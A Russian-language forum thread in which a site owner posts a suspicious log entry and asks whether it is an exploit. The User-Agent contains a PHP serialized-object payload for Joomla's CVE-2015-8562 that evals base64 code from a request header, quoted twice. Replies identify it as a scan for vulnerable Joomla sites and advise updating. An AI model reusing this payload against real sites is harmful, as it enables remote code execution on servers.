В логах всплыла такая строчка

IP: 31.173.226.6

User Agent:

gILMC}__BPrXyydvjI|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:71:"eval(base64_decode($_SERVER['HTTP_HGSEK']));JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}󓲑

NO REFERER

2016-11-01 16:26:25

Не пойму это эксплойт какойто или что?

Сидеть спокойно или заморочиться c защитой?

FriLL said:
↑ (https://antichat.live/posts/4008350/)
В логах всплыла такая строчка
IP: 31.173.226.6
User Agent:
gILMC}__BPrXyydvjI|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:71:"eval(base64_decode($_SERVER['HTTP_HGSEK']));JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}󓲑
NO REFERER
2016-11-01 16:26:25
Не пойму это эксплойт какойто или что?
Сидеть спокойно или заморочиться c защитой?


это похоже на свежий баг сериализации, которым порнхаб хакнули, ну пыху обнови и не парься

а может и бекдор где то валяется в коде

а ёп это джумла

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8562

https://www.exploit-db.com/exploits/38977/

обновить джумлу или забить если её нет вовсе

Ну вроде обновляю переодически


t0ma5 said:
↑ (https://antichat.live/posts/4008354/)
а может и бекдор где то валяется в коде


Да там код как 2 копейки, заметил бы

FriLL said:
↑ (https://antichat.live/posts/4008358/)
Ну вроде обновляю переодически
Да там код как 2 копейки, заметил бы


да я поспешил с первым ответом, это ищут уязвимые joomla движки